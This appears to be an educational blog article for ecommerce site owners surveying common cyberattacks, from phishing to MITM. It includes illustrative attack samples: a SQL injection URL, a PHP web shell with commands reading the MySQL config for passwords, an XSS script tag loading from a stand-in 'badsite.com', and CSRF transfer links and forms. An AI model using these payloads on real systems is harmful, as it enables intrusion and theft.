Know Which Are the Common Forms of Cyber Security Attack to Create a Robust Defense Strategy & Protect Your Ecommerce Business
However, it’s equally important to understand the types of cyber attacks. Though it’s discomforting to know about the threats, but until you don’t understand what types of cyber attacks you should watch out for, you won’t be able to create an effective strategy to defend against such threats.
To get the best out of ROI from the time and money you spend towards securing your website from different types of cyberattacks, you should know about attacks too. Some of the common forms of cyber security attack that everyone should be aware of are:
- Credential Stealing Phishing Attack
- Malware Based Phishing Attack
- Phone-based Phishing Attack
- SQL/Code Injection Attack
- Misconfigured Software
- Attacks Through Uploading Files
- XSS (Cross-Site Scripting) Attacks
- Password Attacks
- Cross-Site Request Forgery (CSRF)
- Outdated (Vulnerable) Software
- Accidental Exposure Of Sensitive Data
- DDoS (Distributed Denial Of Service) Attack
- DNS Spoofing
- Man-In-The-Middle Attack
Social Engineering – Attack Against People
It’s the first category of attack, also known as phishing or social engineering attack. Technically, it’s not an attack, but it dupes users in one or the other way. For instance, a hacker may try to target a company by clicking a malicious link that asks them for login details.
- Some of the different types of Phishing attack are:
- Credential Stealing Phishing Attack
- Malware based Phishing Attack
- Phone-based Phishing Attack
Let’s look into it one by one about these common types of phishing attacks.
1. Credential Stealing Phishing Attack
It’s the growing phishing attack that’s quite popular among cybercriminals. As the name implies, it’s a phishing attack done by cyber attackers to trick users into giving their login credentials. It’s one of the commonly used phishing attacks as it doesn’t have any special requirement. It’s a cheap and extremely efficient approach to trick the victim.
How terrifying this attack can be is based on human interaction. Usually, victims of this attack are corporate employees’ accounts, social media accounts of an organization like LinkedIn to search for any specific employee with a credential that gives access to all other important accounts.
Here’s How Credential Stealing Phishing Attack Works
Credential stealing phishing attacks are used for many purposes, and it’s not limited to gaining access to only social media accounts. Some other purpose for which cyber criminals aims to use this attack method is to steal users bank details, stealing employees tax IDs, gift cards, and much more.
Besides, here below are some basic steps that most cybercriminals use while making a credential-stealing phishing attack:
Identifying Victims: Attackers first do company research and try to figure out who has the most access to, especially the admin panel of your website, email address, and other critical accounts. If they can’t identify the right person, they may send an email to all the available email addresses, and based on that, they’ll try to figure out who has the most access.
Sending Malicious Phishing Email: Once they get their hand on an email address, they’ll send an email to that address that incites the reader to click on the link provided in that email, and usually, that link goes to a fake login page, where they ask for the login credential. The sent email could be anything, for instance, fake customer complaints or service warning from hosting providers, etc.
Credential Harvesting: It provokes you to login into that fake login page, and once you do so, the hacker will gain access to their login credential, as submitted login details go directly into the hacker’s server.
Log in Into an Account: Once they get their hand on the login details, they’ll use that login details to log into the website. Further, they can even use the “forget password” feature to get into the website or other critical systems through that email address.
Example of Credential Stealing Phishing
2. Malware Based Phishing Attack
It’s another common cyber attack where the main goal is to install malware on the victim’s system that can return login credentials of the website or get other data such as address book. Most of the time, attackers use the most common delivery vehicle email to execute these cyber attacks.
How Malware Based Phishing Attack Works
Scrutinizing Targeted Victims: Hackers select their targets by carefully researching, analyzing, and selecting a few employees from the organization or sending malicious emails to everyone.
Sending Malicious Email: Once hackers select their targeted victims, they’ll send a malicious email that consists of malware hidden within a file, such as malware disguised within a job applicant’s resume, file from the employer, or any customer’s purchase order.
Malware Installation: Once the attached file is opened by the victim sent through email, malware will get installed on their system. Depending upon the nature and type of malware, the attacker may get full control over the system.
Data Collection: Once the malware gets into the system, the hacker will do all types of nasty deeds such as using a keylogger to get passwords or any other sensitive details, pull out stored address books, or stored passwords through your computer.
Accessing Systems: Finally, after getting the data they attacked, they use those credentials to log in to your site and perform other attacks.
Example of Malware Based Phishing Attack
3. Phone-Based Phishing Attack
Quite similar to a phishing email, but it’s somewhat different. Here, the attacker uses SMS messages or voice calls. It usually needs more effort, so it’s a quite targeted attack on certain people, not everyone.
This attack is further categorized in two different ways SMS phishing and Voice Phishing.
SMS Phishing
SMS phishing, also known as smshing, uses phone text messages to deliver fake SMS that encourages people to provide personal details.
One famous example of SMS phishing was noticed earlier in 2018 when Orange County SSA (Social Services Agency), California has to warn their residents regarding text scam that tried obtaining information about cards from the clients of CalFresh, CalWORKs, and General Relief.
Voice Phishing
Voice phishing, also called “Vishing” (the combination of Voice and Phishing), is another criminal phone fraud that uses social engineering through a telephone system to gain access to sensitive information such as financial details.
One famous example of Voice Phishing was registered in Sweden regarding the Mobile Bank that identifies the user in internet banking. Here, many users who have made use of this app have recorded a call from fraudulent people claiming to be an officer from the bank, saying there’s a security issue with the installed app and asked them to use their Mobile Bank ID app. A similar attack has recently been reported on December 9, 2020, where alleged attackers started targeting older people in the New Ferry area, Wirral Peninsula, England, offering COVID-19 vaccine.
Code-Based Attacks – Attacks Against Machines
Code-based attacks are another common form of cyber security attack, where coding is done to break into websites. These types of cyber attacks are often shown in movies where geek kid gets full control of the computer systems by typing a few codes. However, Hollywood overly exaggerates how easy it’s to perform, but it’s just the basic idea.
Let’s get into details and find some of the most common cybersecurity attacks that use such code tricks. So, you get an idea of how hackers use code vulnerabilities to get unauthorized access to the website.
Below are some of the commonly seen code-based attacks that you should be aware of:
- SQL/Code Injection Attack
- Misconfigured Software
- Attacks through Uploading Files
- XSS (Cross-Site Scripting) Attacks
- Password Attacks
- Cross-Site Request Forgery (CSRF)
- Outdated (Vulnerable) Software
- Accidental Exposure of Sensitive Data
- DDoS (Distributed Denial Of Service) Attack
- DNS Spoofing
- Man-In-The-Middle Attack
4. SQL/Code Injection Attack
SQL (Structured Query Language) and code injection are different types of cyber attacks that do the same thing. It means it sends certain commands to a website for tricking into doing something that shouldn’t be done.
For instance, it uses malicious SQL code to manipulate back-end databases and access information normally not displayed, such as the number of items and other sensitive details of the company data, private customer details, or user lists.
Usually, SQL injection occurs when data enters a program through an untrusted source, or the data is used for dynamically constructing a SQL query.
Similarly, in code injection attacks, also known as RCE (Remote Code Injection), malicious code is executed by an attacker or executing malicious code. Here, an attacker’s capabilities are dependent upon the limits of the server-side interpreter, for instance, PHP or Python.
Let’s look at it with an example.
SQL Injection Attack Example
There are many types of SQL injection vulnerabilities, techniques, and attacks that come from different situations. One among them commonly seen SQL injection attacks are retrieving confidential data, where you modify SQL query, so it returns additional results.
Let’s illustrate it.
For example, there’s a shopping portal that displays various products from different categories. And, once the user clicks on the category called Clothes, the browser requests the below URL:
https://example-website.com/products?category=Clothes
It triggers an SQL query for retrieving details regarding those products through the database.
SELECT * FROM products WHERE category = 'Clothes' AND released = 1
Once the above query gets executed, it asks below information from the database:
- Asterisk (*) – All Details
- From – From The products table
- Where the category is Clothes
- And released = 1
If any defense system hasn’t been implemented for SQL injection attack, then an attacker can attack like:
https://example-website.com/products?category=Clothes'--
And, it results in the SQL query as:
SELECT * FROM products WHERE category = 'Clothes'--' AND released = 1
The main difference here is that double dash. In SQL, it means comment, and once it’s placed, the rest of the query is counted as a comment. It removes the remaining query, so it’ll not count released = 1 in the query. And, it’ll display all the products, including those unreleased products.
5. Misconfigured Software
It’s another common form of cyber security attack where the server or web application security controls haven’t been properly defined, or if it’s then with errors. For instance, database, software, or any CMS should be password protected to keep unauthorized users away.
Misconfiguration in security measures is a widespread issue, and it can happen at any level. According to OWASP 10, this software misconfiguration is listed as 6 on the list of essential web application security issues.
Without the right level of protection, security misconfigurations can open gates to new risks such as
- Legacy applications try to communicate with applications that don’t exist anymore. And, attackers can take benefit of such things and can establish the connection.
- Administration ports that aren’t necessary but remain open for an application which can result in remote attacks.
- Outbound connections to different internet services can reveal unwanted behavior patterns of application in a certain environment.
6. Attacks Through Uploading Files
The file upload function is a favorite target among hackers, as it allows your site to take a big chunk of data and write it to disk. The dark side is that it gives hackers a huge opportunity to transmit malicious codes onto your website server.
As file upload functionality is becoming a critical part of any website, it has become the major problem within web-based applications. In most web servers, this file upload vulnerability depends upon purpose, which lets an attacker upload a file with malicious codes, which can later be executed on the server.
This file upload attack is becoming quite common against websites that let users upload files, for instance, contact form attachments, social media posts, profile photos, etc. If you’re thinking your site doesn’t have this feature and there’s no need to worry about it, then hold on. Most website platforms, including the one you’re using, contain code for supporting file upload features, such as code in a user profile or contact form.
One recent example of this flaw that made the headlines was founded on August 2020 WordPress quiz plugin named Quiz and Survey master was installed and used over 30K+ sites. It was vulnerable to two critical flaws that included file upload vulnerability that allowed attackers to take over the whole website. Another challenging exploit founded recently in December 2020 is that plugin “Contact Form 7” running on more than 5M+ WordPress websites was open to this file upload attack.
Example of Attacks Through Uploading Files
Let’s illustrate File upload attack based on real-world example, so you can figure out why these types of cyber attacks are favorite among cybercrooks:
- Bob is a hacker that recently signed up for a website that runs on popular CMS (Content Management System).
- He created a profile and noticed that he could upload profile images using an image upload function.
- He becomes aware that some other things like uploaded files don’t get renamed during the upload process, and the name of the file appears in the profile image URL when it gets published. Further, verification of file-type is done using JavaScript.
- Bob, writes a simple PHP script and saved it with file name exploit.php. Whenever this web shell is executed using PHP, it’ll run whichever command passed in the “cmd” parameter
if(isset($_REQUEST[‘cmd’])) {
$cmd = ($_REQUEST[‘cmd’]);
system($cmd);
} else {
echo "Type command you want to pass";
}
?>
Web Shell Command that runs any passed command in the “cmd” parameter whenever it’s executed using PHP
- Hacker disables JavaScript in his web browser and uploads the file exploit.php that he just created as his profile image. Subsequently, the file type is not verified as JavaScript, as its disabled.
- Without any surprise, the hacker’s profile image looks broken as the uploaded file is not an image. But, he gets what he wanted, and the written PHP script is uploaded on the server.
- He goes to the “profile image” URL through the browser address bar, which executes that written PHP script.
- Now, he will pass whichever command he wants to in the “cmd” parameter, and it executes on the server. As a result, his uploaded PHP file has created a command execution vulnerability.
- Due to this, he can easily get access to sensitive data on the server. For example, bypassing the locate my.cnf command can find the configuration file of a database.
example-website.com/1a2fe/exploit.php?cmd=locate+my.cnf
- Further, he can invoke the cat/etc/mysql/my.cnf command for reading the file to find the database password.
example-website.com/1a2fe/exploit.php?cmd=cat+/etc/mysql/my.cnf
7. XSS (Cross-Site Scripting) Attacks
XSS abbreviation of Cross-Site Scripting is a type of injection attack that injects malicious scripts like JavaScript into your website. XSS attacks occur whenever an attacker makes use of a web application to send malicious code. Another common cyber security attack enables attackers to inject client-side scripts into web pages opened by other users instead of the server-side.
In other words, the main concept behind the XSS attack is to manipulate the client-side script of a web application for executing in a way hacker desires. For instance, through cross-site scripting vulnerability attacks, an attacker can bypass access to controls like the same-origin policy. Another example is embedding script into a page that executes whenever you load the web page or whenever the related event occurs.
Besides, recently some big names surfaced, like recently in the third week of December 2020, network security appliance F5 found a series of vulnerabilities, including XSS (Cross-Site Scripting) BIG-IP products, which posed serious threats. Another one is of November 2020, where a bug bounty researcher has found XSS (Cross-Site Scripting) vulnerability in popular video platform website TikTok (though it’s patched) capable of taking over account through one-click.
Example of XSS (Cross-Site Scripting) Attack
Let’s illustrate with an example of how this cross-site scripting attack works:
- For instance, there’s a blog example-website.com, and it has kept an option for site visitors to comment on the post.
- Hackers visit the blog and leaves a comment, that includes code in reference of comment as an external JavaScript file: <script src="http://badsite.com/hack.js"></script>
- This hack.js JavaScript file may contain numerous malicious code that can harvest user logins, executes malware download, secretly fetch browser cookies of the user, etc.
- So, blog example-website.com visitors will be exposed to that malicious code while browsing the site.
8. Password Attacks
The login attack, also called Password Attack, is another common cyber attack where hackers try to access your site by exploiting passwords. In other words, Login attacks like brute force attacks don’t require any type of special malicious code or software. All it takes is an attacker to try cracking your password using software that runs on the attacker’s system.
Besides, such software uses different attacking methods like a brute force to guess passwords so that attackers can access accounts. Some common type of login attacks that you should know about for your website security are like:
Brute Force Attack
Brute force attack is the most common form of cybersecurity attack where hackers use the bot for randomly generating passwords and try logging using those generated passwords until they get the correct one. This type of attack is usually helpful when there’s no probability of taking advantage of other weaknesses in an encryption system.
Dictionary Attack
A dictionary attack is an attack that breaks user accounts by analytically entering words in a dictionary as a password. Further, this type of attack is also used by attackers to find the key that’s necessary to decrypt your encrypted message or document. Hacker often uses bots to randomly generate passwords based on some commonly used words from the dictionary. Sometimes, hackers even try common deviations of words such as Rainbow, RainBow, rainbow, etc.
Password Spraying
It’s another type of login attack similar to brute force, but it uses a few common passwords that many users use. Password spraying attacks let attackers access a large number of accounts using commonly used passwords.
Credential Stuffing
Credential stuffing is another common form of cyber security attack where attackers use already compromised user login details to access a system. Besides, attackers often get success as many times users use the same password for multiple sites. If one account gets compromised, you may change the password for that, but at the same time, you may forget to change for other accounts for which you’re using similar passwords. For example, if you’re using mysunshine20!! Then it’s likely you might be using somewhere else too.
- Broadly available massive database of already breached credentials in the community of hackers.
- More advanced bots that simultaneously tries several logins and make it appear through different IP addresses.
9. Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery abbreviation of CSRF, also called XSRF, Session Riding or Sea Surf, is an attack where hackers launch attacks against website visitors instead of the website itself. In other words, it’s an attack where an attacker targets you to execute unwanted actions on a web application on which you’re currently authenticated. Using little social engineering, for instance, sending a malicious link through email or chat, an attacker can trick you into executing certain actions chosen by them.
Example of CSRF Attack
Before attacking, hackers usually study the targeted web application to make malicious requests appear as legit as possible.
For instance, a usual GET request for transferring $1000 may look like
GET http://yourbank.com/transfer.do?acct=Customer&amount=$1000 HTTP/1.1
Once the request modification has been made, it’ll allow them to transfer $1000 into their account.
GET http://yourbank.com/transfer.do?acct=Hacker&amount=$1000 HTTP/1.1
Such malicious request can easily be embedded into a usual looking hyperlink
<a href="http://yourbank.com/transfer.do?acct=Hacker&amount=$1000">Know more!</a>
After creating this link, hackers can easily distribute it through email to bank customers. If you click on this link while being logged into your bank account, it’ll initiate the $1000 amount transfer without the customer’s intention.
Besides, if bank is making use of only POST request, then it may become impossible for hackers to make requests through <a> href tag. But, they can try attacking through <form> tag that automatically executes embedded JavaScript. For example, form may look like:
<form action="http://yourbank.com/transfer.do" method="POST">
<input type="hidden" name="acct" value="Hacker"/>
<input type="hidden" name="amount" value="$1000"/>
<input type="submit" value="View the message!"/>
</form>
</body>
- You’ve got an account on a banking website, where once you logged in, you can submit a form for transferring funds through wire transfer to another person’s account.
- Now, hackers may build a “malicious webpage” that includes a malicious script which fills and submit wire transfer form.
- No doubt, you’ve to be logged in to your bank account for form submission to work. So, hackers may dupe you into logging into your bank account, and for that, they send email disguising email coming from your actual bank, so you log into your account.
- So, once you log into an account and visit that malicious webpage build by the hacker, the form will be submitted automatically by a web browser without any prior notification.
10. Outdated (Vulnerable) Software
Outdated software or those that haven’t been patched are common security threats you should be careful about. It’s among those common security threats that hackers can do serious damage to your website and site visitors.
Innovations and software technology come with a short life cycle that needs ongoing updates and upgrades to keep your website run smoothly and safely while being compatible with other software.
For instance, if you have a WordPress site and don’t update it once it gets available, you may become open to some serious threats and vulnerabilities that it may be posing (that gets removed in the updated version.) Some of the commonly seen attacks on such outdated software versions are attacks through SQL injection, brute force, etc.
11. Accidental Exposure of Sensitive Data
You can’t exactly say it’s one of the common forms of cyber security attack, as it’s quite equivalent to keeping your jewelry outside your house and expecting to find it after a month. As the name implies, once someone keeps sensitive data out in public, it may become open to the data breach, an attacker can gain unauthorized access to it.
Some of the most common accidental exposure of sensitive data that can lead to serious attacks are like:
- Access to database tables through database software without requiring any password.
- Displaying very detailed error message that consists of sensitive information or data.
- Excel sheets containing customer data uploaded to the server that can be accessed publicly through publicly available URLs.
- Publicly accessible log files containing sensitive data.
- Two different leaks came out through third party companies where 540+ Million Facebook record found exposed on AWS servers, as they’d collected Facebook data on their servers. – Wired.com April 3, 2019.
- More than 1 Billion records were found exposed online with data leaks of Facebook, LinkedIn, and Twitter profiles. – Wired.com, November 22, 2019.
- Data of 150K patients found exposed due to a misconfigured AWS bucket. Here, Patient Home Monitoring couldn’t lock down public access to an online server, leading to such exposure of patient details. – HealthcareITNetws.com, October 12, 2017.
12. DDoS (Distributed Denial of Service) Attack
DDoS (Distributed Denial of Service) attack is another common form of cyberattack. Here an attacker tries to make a server resource unavailable, temporarily or indefinitely disrupting the services hosted by your website.
It’s another common cyber attack where an attacker tries to stop service from being delivered. This DDoS attack thwarts through virtually anything such as devices, services, networks, applications, servers, or even through some types of transactions within an application. One of the recent DDoS attacks that take the internet by storm, Cloudflare has been identified with a new type of DDoS attack inspired by an acoustic beat.
Besides, there are three different types of DDoS attack,
- The volume-based attack uses a massive amount of fake traffic to overflow resources like servers or websites. It includes UPD, ICMP, and spoofed-packet flooding attacks. The size of this volume-based attack is measured through bits per second (bps).
- Application layered attack that’s conducted by flooding applications with malicious requests. Here, the application-layer attacks are measured through request per second (RPS).
- Protocol or Network layered DDoS attack where many packets are sent to the victim’s network infrastructure and infrastructure management tools. It includes Smurf DDoS and SYN flood, and their size is measured through packets per second (PPS).
Here’s How This Cyber Attack DDoS Works
- First hacker attacks on numerous websites, servers, and IoT devices.
- Installs malware script on those hacked devices so that it can execute commands given by him.
- The attacker selects a target and figures out the weak point of that website. For instance, the web page that displays a huge chunk of database calls.
- Once the target is identified, an attacker sends commands on all the compromised devices to continuously send repeated requests to that website.
- Once the targeted website gets overloaded, that server/application will stop working, and ultimately it’ll crash or simply become unresponsive to real users.
13. DNS Spoofing
DNS Spoofing, also called DNS cache poisoning, exploits vulnerabilities in DNS (Domain Name System) for distracting internet traffic from the legit server to fake servers.
In other words, DNS cache poisoning means submitting false information into a DNS cache, so DNS queries return incorrect responses, and users land on the wrong websites.
Working of DNS Spoofing Attack
Let’s illustrate DNS spoofing attacks using an example where the client is looking to connect to the website https://www.yourexamplesite.com/ and becomes the DNS spoofing victim.
- d1 – Client requests IP address for the hostname yourexamplesite.com through the DNS server.
- d2 – The Client gets the response for the sent request, but it doesn’t contain the legit IP address. Hence, connection to the server of yourexamplesite.com is not established.
- h1 – After getting connected with that fake IP address, the client’s request goes directly to that malicious host.
- h2 – In return, the malicious host returns the request with the fake website that the client requested as a genuine one.
- A, B & C Are three different attack points for DNS spoofing: client-side, network connection, and another on the DNS server.
14. Man-in-the-Middle Attack
Main-in-the-Middle (MITM) Attack is another common cyber attack method in existence for a long time. In this cyberattack, the attacker comes between two parties communicating with each other, impersonating both of them, and gaining access to all the information they are trying to send to each other.
In a MITM attack, an attacker can intercept, send, and receive data meant for someone else without the victim’s knowledge until it’s too late.
The reason behind the MITM attack is to get access to critical information like login credentials, credit card numbers, account details, or any other sensitive information. It’s among common types of cybersecurity attacks faced mostly by users of financial applications, e-commerce websites, SaaS businesses, or any other that requires you to enter your login details. It’s a common form of a cybersecurity attack that often occurs if proper security precautions are not in place. For instance, all Kubernetes versions were affected due to unpatched MITM vulnerability.
Key Things About MITM Attack
- One type of eavesdropping attack that happens when an attacker comes in between a proxy into a communication session between a system and people.
- Once the MITM attack happens, it exploits real-time sessions such as financial transactions, transfer of any sensitive data or conversations.
Here’s How MITM Attack Works
A MITM attack usually takes place through the below-mentioned phases:
Intervention
- In this phase, an attacker first gains access to a network by manipulating DNS (Domain Name System) servers or through ill secured Wi-Fi router.
- Once it gains access, it scans the router for vulnerabilities and tries to look for an entry point.
- Attacker Tries entering by breaking weak passwords or using an advanced method such as cache poisoning or IP spoofing.
Decrypting Data
- After getting into Network, attackers steal critical data and decodes it.
- Once stolen data is decrypted, it’s leveraged for many evil purposes such as identity theft, fraudulent bank activity, unauthorized purchases, etc.
Methods
Cyber crooks use a wide variety of methods to execute a MITM attack, and some common ones are:
- Hacker impersonates already established IP (Internet Protocol) for duping victims.
- Redirect user from original destination to a malicious website to access critical data like login credentials or other personal information.
- Stealing browser cookies that have personal information.
- Eavesdropping on your web activity.
Wrapping Up
These are some common types of cyber attacks that take place often. In this digital world, managing websites or using the internet daily is quite normal. But, it’s equally important that you should stay aware of the risks that come along.
To create robust website security protocols or take proactive steps to keep yourself protected from the gangsters of the online world, you should be aware of some of the common forms of cyber security attacks, as mentioned here. So, you can take better security measures to keep your website safe.